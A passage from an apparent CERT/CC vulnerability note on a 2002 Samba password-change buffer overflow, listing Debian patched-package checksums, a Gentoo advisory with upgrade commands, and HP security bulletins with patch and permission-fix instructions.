\n``<http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12_alpha.deb>`` \nSize/MD5 checksum: 2951852 f880e61a41534119a50a9ae282212421 \n` \n` arm architecture (ARM) \n` \n` ``<http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12_arm.deb>`` \nSize/MD5 checksum: 827734 e3592bb5e8c72aa3345176ac04374ae7 \n``<http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12_arm.deb>`` \nSize/MD5 checksum: 971194 b57cf8b4f59e0494d40faa01727068d3 \n``<http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12_arm.deb>`` \nSize/MD5 checksum: 555212 485db779cf0088b7517c16f9db37563c \n``<http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12_arm.deb>`` \nSize/MD5 checksum: 2538940 fcfac695c9519b47a1a8d88816567461 \n``<http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12_arm.deb>`` \nSize/MD5 checksum: 1020942 1546a075896de1bdffcf7b94f73237c5 \n``<http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12_arm.deb>`` \nSize/MD5 checksum: 396136 b89712a3f81a1517c03d72e92f2f0d8a \n``<http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12_arm.deb>`` \nSize/MD5 checksum: 545278 868d941841b8202fdd31e3abdfcccae0 \n``<http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12_arm.deb>`` \nSize/MD5 checksum: 997842 b5ddde05fb712e4caece39742729587d \n``<http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12_arm.deb>`` \nSize/MD5 checksum: 460106 c172491c4ee37bf799984a365102ee2c \n` \n` hppa architecture (HP PA RISC) \n` \n` ``<http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12_hppa.deb>`` \nSize/MD5 checksum: 490226 27845f64f50ff1e878b6c35c630d6c33 \n``<http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12_hppa.deb>`` \nSize/MD5 checksum: 588196 f0cfc0eca799ac5367ac00d1fb557b07 \n``<http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12_hppa.deb>`` \nSize/MD5 checksum: 1058852 38f1ac012369422463a7795a5d8347c2 \n``<http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12_hppa.deb>`` \nSize/MD5 checksum: 1080408 33784c32dfe825aad5f8a532e960e1de \n``<http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12_hppa.deb>`` \nSize/MD5 checksum: 419192 830dda3c6340905e50846b052e861633 \n``<http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12_hppa.deb>`` \nSize/MD5 checksum: 899680 c3a982a826f2e1e0741532ea9b3b713c \n``<http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12_hppa.deb>`` \nSize/MD5 checksum: 589188 01adde49d328f27cc03dc07cf67680fe \n``<http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12_hppa.deb>`` \nSize/MD5 checksum: 1083762 bfea5fc49e57c1605057777e9f3109e8 \n``<http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12_hppa.deb>`` \nSize/MD5 checksum: 2788718 7eb604a2b4a480096b695e5cd4d8da84 \n` \n` i386 architecture (Intel ia32) \n` \n` ``<http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12_i386.deb>`` \nSize/MD5 checksum: 445374 a85056ba4ba3b87ada684a8014eb7990 \n``<http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12_i386.deb>`` \nSize/MD5 checksum: 928972 81833ccd4b60b1d29adcf7447ae22ca9 \n``<http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12_i386.deb>`` \nSize/MD5 checksum: 792318 9f067eee4ed00ff7697f9564eff78b1f \n``<http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12_i386.deb>`` \nSize/MD5 checksum: 952666 ed2648d7c6b58ea6d7213c77c1f48bbd \n``<http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12_i386.deb>`` \nSize/MD5 checksum: 388394 bdd346a1fea3b494cbcb3cb11dc9ef96 \n``<http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12_i386.deb>`` \nSize/MD5 checksum: 2415034 d868491571d191a813dbaf57a7d4708f \n``<http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12_i386.deb>`` \nSize/MD5 checksum: 992248 6c4ae105bed3341a7f75c72088fc6b4a \n``<http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12_i386.deb>`` \nSize/MD5 checksum: 499028 462a7b14146f2260605f812864b3d76f \n``<http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12_i386.deb>`` \nSize/MD5 checksum: 534722 9390c2ec3763ac36d0b721c5504b3e82 \n` \n` ia64 architecture (Intel ia64) \n` \n` ``<http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12_ia64.deb>`` \nSize/MD5 checksum: 552692 042613b1ccb5558434143cf36ae80753 \n``<http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12_ia64.deb>`` \nSize/MD5 checksum: 1095708 fe153731989182f94daeed671f5b708b \n``<http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12_ia64.deb>`` \nSize/MD5 checksum: 461212 ad9be5397fc945947a370532a0ff5255 \n``<http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12_ia64.deb>`` \nSize/MD5 checksum: 3486514 05bfbd1f12b7bd86bbdc4bc045a646ca \n``<http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12_ia64.deb>`` \nSize/MD5 checksum: 1246972 dd178013fef5bc1dc26fcc3c26a2964b \n``<http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12_ia64.deb>`` \nSize/MD5 checksum: 1326550 a682d63e46dba34ef0616c35aa162300 \n``<http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12_ia64.deb>`` \nSize/MD5 checksum: 1280400 e726e9a101dc51e01fa0b390821f7f1b \n``<http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12_ia64.deb>`` \nSize/MD5 checksum: 694496 d0d3323d614f14a255c1f38a0c1d7a1e \n``<http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12_ia64.deb>`` \nSize/MD5 checksum: 623720 a6c3b79db8d814cd528675a70065f8cf \n` \n` powerpc architecture (PowerPC) \n` \n` ``<http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12_powerpc.deb>`` \nSize/MD5 checksum: 1000492 5e2514849a99dd1b692ceea3371417d1 \n``<http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12_powerpc.deb>`` \nSize/MD5 checksum: 559952 423f249ff3691860668f428b754f7578 \n``<http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12_powerpc.deb>`` \nSize/MD5 checksum: 545346 157d1833143dee0f5cad3585ea363e46 \n``<http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12_powerpc.deb>`` \nSize/MD5 checksum: 1035624 e4b852940d6bdce313cb3e7b668e2c21 \n``<http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12_powerpc.deb>`` \nSize/MD5 checksum: 1020036 eeaef7fe954149cc547266323ab64433 \n``<http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12_powerpc.deb>`` \nSize/MD5 checksum: 2605718 a77c4fe21962efddb97160bad6220bbb \n``<http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12_powerpc.deb>`` \nSize/MD5 checksum: 851144 88fc9331f16c31a1ce2a07c82ffa98d7 \n``<http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12_powerpc.deb>`` \nSize/MD5 checksum: 474558 19580f6109552c39453b9516aea7161b \n``<http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12_powerpc.deb>`` \nSize/MD5 checksum: 408470 a43d6edffd90cd457750226d18a914f9 \n` \n` s390 architecture (IBM S/390) \n` \n` ``<http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12_s390.deb>`` \nSize/MD5 checksum: 525784 7e251a6496d905a974d177c2f64968d8 \n``<http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12_s390.deb>`` \nSize/MD5 checksum: 402670 45fe4eab1b2b2a5a453fb2fcb63d2bb8 \n``<http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12_s390.deb>`` \nSize/MD5 checksum: 979614 9d159305c5bdf5f4d2859c70fea1fe49 \n``<http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12_s390.deb>`` \nSize/MD5 checksum: 468906 ea0be1d14a305b21ffc2b61129756ee3 \n``<http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12_s390.deb>`` \nSize/MD5 checksum: 1006360 25e9bdf52fdfa988f27ece4f0ed40dc2 \n``<http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12_s390.deb>`` \nSize/MD5 checksum: 829674 9733bce59be83972d401bd860e450ad5 \n``<http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12_s390.deb>`` \nSize/MD5 checksum: 2488818 06c9d8cb4d2f74d9befef7bdaf4585ae \n``<http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12_s390.deb>`` \nSize/MD5 checksum: 536106 8208c2b787bb676f3bcbefa2c39a5f57 \n``<http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12_s390.deb>`` \nSize/MD5 checksum: 962980 be1472ede7611310f2f38f6ff1748c6d \n` \n` sparc architecture (Sun SPARC/UltraSPARC) \n` \n` ``<http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12_sparc.deb>`` \nSize/MD5 checksum: 2511036 f0ff0e99290754f16fa1908fdddb45fe \n``<http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12_sparc.deb>`` \nSize/MD5 checksum: 827784 d9db5769e8cffc2c4f5b98782b500550 \n``<http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12_sparc.deb>`` \nSize/MD5 checksum: 400106 42c72cde09e8e2004e46409d1a126f04 \n``<http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12_sparc.deb>`` \nSize/MD5 checksum: 963226 b15cd5548aa1e860b6e9bb47f30522e9 \n``<http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12_sparc.deb>`` \nSize/MD5 checksum: 983220 d502115d1ad1815f2dc11c4aca901857 \n``<http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12_sparc.deb>`` \nSize/MD5 checksum: 1010096 3b23c98f66e6930f7c2b69d44df87c16 \n``<http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12_sparc.deb>`` \nSize/MD5 checksum: 542824 c3781f7ce47e3539fdb2845b3035d0ad \n``<http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12_sparc.deb>`` \nSize/MD5 checksum: 461100 0e332969cc1dfb58f28e2d5ad7ccb310 \n``<http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12_sparc.deb>`` \nSize/MD5 checksum: 522938 ac87211100409cb76e6da6be7aedbc9e \n` \n`- -- \n- ---------------------------------------------------------------------------- \nDebian Security team <team@security.debian.org> \n``<http://www.debian.org/security/>`` \nMailing-List: debian-security-announce@lists.debian.org \n` \n \n`-----BEGIN PGP SIGNATURE----- \nVersion: 2.6.3ia \nCharset: noconv \n` \n`iQB1AwUBPd6RtajZR/ntlUftAQEf+wMAlu1wMw5wBrfe0NlmpNWJ1Kz+wpCk9/J6 \nW9XHAk1+oiwOiW3QLYJ56xt8RFfvTgaQA1urU8XLVCLCIHet6VOyA9EGAgudFspF \nFuMKXgv/v8ZNZ45AyeqCJcRTNXoS64TH \n=zLu1 \n-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23958321 Feedback>).\n\n### __ __ Gentoo Linux\n\nUpdated: December 13, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`- - -------------------------------------------------------------------- \nGENTOO LINUX SECURITY ANNOUNCEMENT 200211-007 \n- - -------------------------------------------------------------------- \n` \n`PACKAGE : samba \nSUMMARY?: remote root access \nDATE ?? : 2002-11-21 09:11 UTC \nEXPLOIT : remote \n` \n`- - -------------------------------------------------------------------- \n` \n`- From 2.2.7 release notes: \n` \n`There was a bug in the length checking for encrypted password change \nrequests from clients. A client could potentially send an encrypted \npassword, which, when decrypted with the old hashed password could be \nused as a buffer overrun attack on the stack of smbd. The attach would \nhave to be crafted such that converting a DOS codepage string to little \nendian UCS2 unicode would translate into an executable block of code. \n` \n`Read the full release notes at \n``<http://se.samba.org/samba/whatsnew/samba-2.2.7.html>`` \n` \n`SOLUTION \n` \n`It is recommended that all Gentoo Linux users who are running \nnet-fs/samba-2.2.5-r1 and earlier update their systems as follows: \n` \n`emerge rsync \nemerge samba \nemerge clean \n` \n`- - -------------------------------------------------------------------- \naliz@gentoo.org - GnuPG key is available at www.gentoo.org/~aliz \nwoodchip@gentoo.org \n- - -------------------------------------------------------------------- \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.7 (GNU/Linux) \n` \n`iD8DBQE93KKCfT7nyhUpoZMRAoZeAKCb7Jdu+glo0BIN3wq4+cDSbmQLKACgnbaY \n2+7FwJUYxYALLzhRpckJuNE= \n=PWpJ \n-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23958321 Feedback>).\n\n### __ Hewlett-Packard Company\n\nUpdated: December 12, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`HP Support Information Digests \n`\n\n`=============================================================================== \no Security Bulletin Digest Split \n------------------------------ \n` \n` The security bulletins digest has been split into multiple digests \nbased on the operating system (HP-UX, MPE/iX, and HP Secure OS \nSoftware for Linux). You will continue to receive all security \nbulletin digests unless you choose to update your subscriptions. \n` \n` To update your subscriptions, use your browser to access the \nIT Resource Center on the World Wide Web at: \n` \n` ``<http://support.itrc.hp.com/>`` \n` \n` Under the Maintenance and Support Menu, click on the \"more...\" link. \nThen use the 'login' link at the left side of the screen to login \nusing your IT Resource Center User ID and Password. \n` \n` Under the notifications section (near the bottom of the page), select \nSupport Information Digests. \n` \n` To subscribe or unsubscribe to a specific security bulletin digest, \nselect or unselect the checkbox beside it. Then click the \n\"Update Subscriptions\" button at the bottom of the page. \n` \n`o IT Resource Center World Wide Web Service \n--------------------------------------------------- \n` \n` If you subscribed through the IT Resource Center and would \nlike to be REMOVED from this mailing list, access the \nIT Resource Center on the World Wide Web at: \n` \n` ``<http://support.itrc.hp.com/>`` \n` \n` Login using your IT Resource Center User ID and Password. \nThen select Support Information Digests (located under \nMaintenance and Support). You may then unsubscribe from the \nappropriate digest. \n=============================================================================== \n` \n \n`Digest Name: daily HP-UX security bulletins digest \nCreated: Wed Dec 11 6:00:03 EST 2002 \n` \n`Table of Contents: \n` \n`Document ID Title \n--------------- ----------- \nHPSBUX0212-232 SSRT2370 Sec. Vulnerability with ntpd on HP-UX \nHPSBUX0212-230 SSRT2437 Sec. Vulnerability in CIFS/9000 Samba Server2 2 \nHPSBUX0212-231 SSRT2434 Sec. vulnerability with HP-UX Visualize Conference \n` \n`The documents are listed below. \n------------------------------------------------------------------------------- \n` \n \n`Document ID: HPSBUX0212-232 \nDate Loaded: 20021210 \nTitle: SSRT2370 Sec. Vulnerability with ntpd on HP-UX \n` \n`TEXT \n` \n \n \n \n \n` ----------------------------------------------------------------- \nSource: HEWLETT-PACKARD COMPANY \nSECURITY BULLETIN: HPSBUX0212-233 \nOriginally issued: 10 Dec 2002 \nSSRT2370 Sec. Vulnerability with ntpd on HP-UX \n----------------------------------------------------------------- \n` \n`NOTICE: There are no restrictions for distribution of this Bulletin \nprovided that it remains complete and intact. \n` \n`The information in the following Security Bulletin should be \nacted upon as soon as possible. Hewlett-Packard Company will \nnot be liable for any consequences to any customer resulting \nfrom customer's failure to fully implement instructions in this \nSecurity Bulletin as soon as possible. \n` \n` ------------------------------------------------------------------ \nPROBLEM: xntpd software may HANG or exhibit extremely poor \nperformance. \n` \n`IMPACT: Potential denial of service (DoS). \n` \n`PLATFORM: HP 9000 Series 700 and 800 running HP-UX releases 10.20, \n10.24, 11.00, 11.04 and 11.11 using the xntpd software. \n` \n`SOLUTION: Retrieve and apply the following patches: \n` \n` for HP-UX 10.20: PHNE_24510 \nfor HP-UX 10.24(VVOS): PHNE_28002 \nfor HP-UX 11.00: PHNE_27223 \nfor HP-UX 11.04(VVOS): PHNE_27442 \nfor HP-UX 11.11: PHNE_24512 \n` \n`MANUAL ACTIONS: No \n` \n`AVAILABILITY: All patches are currently available from <itrc.hp.com>. \n------------------------------------------------------------------ \nA. Background \nSome HP-UX systems running the latest xntpd software may HANG \nor exhibit extremely poor performance. \n` \n` B. Recommended solution \nHP has made available a patch to upgrade NTP timeservices. \nRetrieve and apply the following patches to affected systems. \nfor HP-UX 10.20: PHNE_24510 \n10.24(VVOS): PHNE_28002 \n11.00: PHNE_27223 \n11.04(VVOS): PHNE_27442 \n11.11: PHNE_24512 \n` \n` The patches do not require a reboot. The problem is fixed in \nHP-UX release 11.22. \n` \n` C. To subscribe to automatically receive future NEW HP Security \nBulletins from the HP IT Resource Center via electronic \nmail, do the following: \n` \n` Use your browser to get to the HP IT Resource Center page \nat: \n` \n` ``<http://itrc.hp.com>`` \n` \n` Use the 'Login' tab at the left side of the screen to login \nusing your ID and password. Use your existing login or the \n\"Register\" button at the left to create a login, in order to \ngain access to many areas of the ITRC. Remember to save the \nUser ID assigned to you, and your password. \n` \n` In the left most frame select \"Maintenance and Support\". \n` \n` Under the \"Notifications\" section (near the bottom of \nthe page), select \"Support Information Digests\". \n` \n` To -subscribe- to future HP Security Bulletins or other \nTechnical Digests, click the check box (in the left column) \nfor the appropriate digest and then click the \"Update \nSubscriptions\" button at the bottom of the page. \n` \n` or \n` \n` To -review- bulletins already released, select the link \n(in the middle column) for the appropriate digest. \n` \n` To -gain access- to the Security Patch Matrix, select \nthe link for \"The Security Bulletins Archive\". (near the \nbottom of the page) Once in the archive the third link is \nto the current Security Patch Matrix. Updated daily, this \nmatrix categorizes security patches by platform/OS release, \nand by bulletin topic. Security Patch Check completely \nautomates the process of reviewing the patch matrix for \n11.XX systems. \n` \n` For information on the Security Patch Check tool, see: \n``<http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/>`` \ndisplayProductInfo.pl?productNumber=B6834AA \n` \n` The security patch matrix is also available via anonymous \nftp: \n` \n` ``<ftp://ftp.itrc.hp.com/export/patches/hp-ux_patch_matrix/>`` \n` \n` On the \"Support Information Digest Main\" page: \nclick on the \"HP Security Bulletin Archive\". \n` \n` D. To report new security vulnerabilities, send email to \n` \n` security-alert@hp.com \n` \n` Please encrypt any exploit information using the \nsecurity-alert PGP key, available from your local key \nserver, or by sending a message with a -subject- (not body) \nof 'get key' (no quotes) to security-alert@hp.com. \n` \n` ------------------------------------------------------------------ \n` \n`(c) Copyright 2002 Hewlett-Packard Company \nHewlett-Packard Company shall not be liable for technical or \neditorial errors or omissions contained herein. The information \nin this document is subject to change without notice. \nHewlett-Packard Company and the names of HP products referenced \nherein are trademarks and/or service marks of Hewlett-Packard \nCompany. Other product and company names mentioned herein may be \ntrademarks and/or service marks of their respective owners. \n` \n` ________________________________________________________________ \n-- \n-----End of Document ID: HPSBUX0212-232-------------------------------------- \n` \n \n`Document ID: HPSBUX0212-230 \nDate Loaded: 20021210 \nTitle: SSRT2437 Sec. Vulnerability in CIFS/9000 Samba Server2 2 \n` \n`TEXT \n` \n \n \n \n \n` ----------------------------------------------------------------- \nSource: HEWLETT-PACKARD COMPANY \nSECURITY BULLETIN: HPSBUX0212-0230 \nOriginally issued: 10 Dec 2002 \nSSRT2437 Sec. Vulnerability in CIFS/9000 Samba Server2.2 \n----------------------------------------------------------------- \n` \n`NOTICE: There are no restrictions for distribution of this Bulletin \nprovided that it remains complete and intact. \n` \n`The information in the following Security Bulletin should be \nacted upon as soon as possible. Hewlett-Packard Company will \nnot be liable for any consequences to any customer resulting \nfrom customer's failure to fully implement instructions in this \nSecurity Bulletin as soon as possible. \n` \n` ------------------------------------------------------------------ \nPROBLEM: CIFS/9000 Server 2.2 buffer overflow vulnerability. \n` \n`IMPACT: Potential root access. \n` \n`PLATFORM: HP 9000 servers running the following CIFS Server versions: \n` \n` - A.01.08 \n- A.01.08.01 \n- A.01.09 \n` \n`SOLUTION: Update to CIFS Server 2.2 version A.01.09.01 \n` \n`MANUAL ACTIONS: Yes - Update to version A.01.09.01 \n` \n`AVAILABILITY: CIFS Server 2.2 version A.01.09.01 is currently \navailable from: \n<``<http://www.software.hp.com/NSM_products_list.html>``> \n` \n` ------------------------------------------------------------------ \n` \n` A. Background \nA buffer overrun has been discovered in the HP CIFS Server \nversion A.01.09 and earlier. There is no known exploit of \nthis vulnerability, and the Samba Team has not been able to \ncraft one themselves. \nNevertheless, the Samba Team has judged the vulnerability \nsignificant and announced the defect and fix in their latest \nrelease. HP has integrated the fix into the latest release \nof CIFS Server 2.2 \nFor additional details, see: \n``<http://www.samba.org/samba/whatsnew/samba-2.2.7.html>`` \n` \n` B. Recommended solution \nUpgrade to CIFS Server 2.2 version A.01.09.01 \nwhich is currently available from: \n` \n` <``<http://www.software.hp.com/NSM_products_list.html>``> \n` \n` It is the product B8725AA, CIFS/9000 Server 2.2.c. \n` \n \n` C. To subscribe to automatically receive future NEW HP Security \nBulletins from the HP IT Resource Center via electronic \nmail, do the following: \n` \n` Use your browser to get to the HP IT Resource Center page \nat: \n` \n` ``<http://itrc.hp.com>`` \n` \n` Use the 'Login' tab at the left side of the screen to login \nusing your ID and password. Use your existing login or the \n\"Register\" button at the left to create a login, in order to \ngain access to many areas of the ITRC. Remember to save the \nUser ID assigned to you, and your password. \n` \n` In the left most frame select \"Maintenance and Support\". \n` \n` Under the \"Notifications\" section (near the bottom of \nthe page), select \"Support Information Digests\". \nTo -subscribe- to future HP Security Bulletins or other \nTechnical Digests, click the check box (in the left column) \nfor the appropriate digest and then click the \"Update \nSubscriptions\" button at the bottom of the page. \n` \n` or \n` \n` To -review- bulletins already released, select the link \n(in the middle column) for the appropriate digest. \n` \n` To -gain access- to the Security Patch Matrix, select \nthe link for \"The Security Bulletins Archive\". (near the \nbottom of the page) Once in the archive the third link is \nto the current Security Patch Matrix. Updated daily, this \nmatrix categorizes security patches by platform/OS release, \nand by bulletin topic. Security Patch Check completely \nautomates the process of reviewing the patch matrix for \n11.XX systems. \n` \n` For information on the Security Patch Check tool, see: \n``<http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/>`` \ndisplayProductInfo.pl?productNumber=3DB6834AA \n` \n` The security patch matrix is also available via anonymous \nftp: \n` \n` ``<ftp://ftp.itrc.hp.com/export/patches/hp-ux_patch_matrix/>`` \n` \n` On the \"Support Information Digest Main\" page: \nclick on the \"HP Security Bulletin Archive\". \n` \n` D. To report new security vulnerabilities, send email to \n` \n` security-alert@hp.com \n` \n` Please encrypt any exploit information using the \nsecurity-alert PGP key, available from your local key \nserver, or by sending a message with a -subject- (not body) \nof 'get key' (no quotes) to security-alert@hp.com. \n` \n` ------------------------------------------------------------------ \n` \n`(c) Copyright 2002 Hewlett-Packard Company \nHewlett-Packard Company shall not be liable for technical or \neditorial errors or omissions contained herein. The information \nin this document is subject to change without notice. \nHewlett-Packard Company and the names of HP products referenced \nherein are trademarks and/or service marks of Hewlett-Packard \nCompany. Other product and company names mentioned herein may be \ntrademarks and/or service marks of their respective owners. \n` \n` ________________________________________________________________ \n-- \n-----End of Document ID: HPSBUX0212-230-------------------------------------- \n` \n \n`Document ID: HPSBUX0212-231 \nDate Loaded: 20021210 \nTitle: SSRT2434 Sec. vulnerability with HP-UX Visualize Conference \n` \n`TEXT \n` \n \n \n \n \n` ----------------------------------------------------------------- \nSource: HEWLETT-PACKARD COMPANY \nSECURITY BULLETIN: HPSBUX0212-231 \nOriginally issued: 11 December 2002 \nSSRT2434 Security vulnerability with HP-UX Visualize Conference \n----------------------------------------------------------------- \n` \n`NOTICE: There are no restrictions for distribution of this Bulletin \nprovided that it remains complete and intact. \n` \n`The information in the following Security Bulletin should be \nacted upon as soon as possible. Hewlett-Packard Company will \nnot be liable for any consequences to any customer resulting \nfrom customer's failure to fully implement instructions in this \nSecurity Bulletin as soon as possible. \n` \n` ------------------------------------------------------------------ \nPROBLEM: The installation of HP-UX Visualize Conference leaves \ncertain directories with insecure permissions. \n` \n`IMPACT: Potential increase in privileges, unauthorized access. \n` \n`PLATFORM: HP 9000 Series 700 and 800, HP-UX 11.00 and 11.11 systems \nwhich have ever installed HP-UX Visualize Conference \nversion B.11.00.11. \n` \n`SOLUTION: Change the insecure directory permissions. \n` \n`MANUAL ACTIONS: Yes - NonUpdate \nChange ownership and permissions as follows: \n/etc/dt 755 bin/bin \n/etc/dt/appconfig 755 root/sys \n/etc/dt/appconfig/icons 755 root/sys \n/etc/dt/appconfig/icons/C 755 root/sys \n/etc/dt/appconfig/types 755 root/sys \n/etc/dt/appconfig/types/C 755 root/sys \n` \n`AVAILABILITY: This bulletin will be revised when a product \nupdate is available. \n------------------------------------------------------------------ \nA. Background \nIf HP-UX Visualize Conference version B.11.00.11 has ever been \ninstalled on an 11.00 or 11.11 system the permissions of \ncertain directories may be insecure. \n` \n` The installation of HP-UX Visualize Conference may leave \ncertain directories with insecure permissions. The \nvulnerability is not with the HP-UX Visualize Conference \nproduct itself, but rather with the state of the directory` \n` permissions after HP-UX Visualize Conference has been installed. \nThe vulnerability remains even after HP-UX Visualize Conference \nis removed. \n` \n` The problem arises if the directories do not exist at the time \nHP-UX Visualize Conference version B.11.00.11 is installed. \nTherefore not all systems with HP-UX Visualize Conference \nversion B.11.00.11 are vulnerable. Also once the directory \npermissions are corrected a subsequent reinstallation of \nHP-UX Visualize Conference version B.11.00.11 will not alter \nthe permissions. \n` \n` B. Recommended solution \n` \n` Change the insecure directory permissions using the following \nprocedure or the equivalent: \n` \n` As root create a script \"chown_chmod\": \n` \n` #!/sbin/sh \n# chown_chmod root:sys 755 file \nchown $1 $3 \nchmod $2 $3 \n` \n` Then: \n` \n` chown_chmod bin:bin 755 /etc/dt \nchown_chmod root:sys 755 /etc/dt/appconfig \nchown_chmod root:sys 755 /etc/dt/appconfig/icons \nchown_chmod root:sys 755 /etc/dt/appconfig/icons/C \nchown_chmod root:sys 755 /etc/dt/appconfig/types \nchown_chmod root:sys 755 /etc/dt/appconfig/types/C \n` \n \n` C. To subscribe to automatically receive future NEW HP Security \nBulletins from the HP IT Resource Center via electronic \nmail, do the following: \n` \n` Use your browser to get to the HP IT Resource Center page \nat: \n` \n` ``<http://itrc.hp.com>`` \n` \n` Use the 'Login' tab at the left side of the screen to login \nusing your ID and password. Use your existing login or the \n\"Register\" button at the left to create a login, in order to \ngain access to many areas of the ITRC. Remember to save the \nUser ID assigned to you, and your password. \n` \n` In the left most frame select \"Maintenance and Support\". \n` \n` Under the \"Notifications\" section (near the bottom of \nthe page), select \"Support Information Digests\". \n` \n` To -subscribe- to future HP Security Bulletins or other \nTechnical Digests, click the check box (in the left column) \nfor the appropriate digest and then click the \"Update \nSubscriptions\" button at the bottom of the page. \n` \n` or \n` \n` To -review- bulletins already released, select the link \n(in the middle column) for the appropriate digest. \n` \n` To -gain access- to the Security Patch Matrix, select \nthe link for \"The Security Bulletins Archive\". (near the \nbottom of the page) Once in the archive the third link is \nto the current Security Patch Matrix. Updated daily, this \nmatrix categorizes security patches by platform/OS release, \nand by bulletin topic. Security Patch Check completely \nautomates the process of reviewing the patch matrix for \n11.XX systems. \n` \n` For information on the Security Patch Check tool, see: \n``<http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/>`` \ndisplayProductInfo.pl?productNumber=B6834AA \n` \n` The security patch matrix is also available via anonymous \nftp: \n` \n` ``<ftp://ftp.itrc.hp.com/export/patches/hp-ux_patch_matrix/>`` \n` \n` On the \"Support Information Digest Main\" page: \nclick on the \"HP Security Bulletin Archive\". \n` \n` D. To report new security vulnerabilities, send email to \n` \n` security-alert@hp.com \n` \n` Please encrypt any exploit information using the \nsecurity-alert PGP key, available from your local key \nserver, or by sending a message with a -subject- (not body) \nof 'get key' (no quotes) to security-alert@hp.com. \n` \n` ------------------------------------------------------------------ \n` \n`(c)Copyright 2002 Hewlett-Packard Company \nHewlett-Packard Company shall not be liable for technical or \neditorial errors or omissions contained herein. The information \nin this document is subject to change without notice. \nHewlett-Packard Company and the names of HP products referenced \nherein are trademarks and/or service marks of Hewlett-Packard \nCompany. Other product and company names mentioned herein may be \ntrademarks and/or service marks of their respective owners. \n` \n` 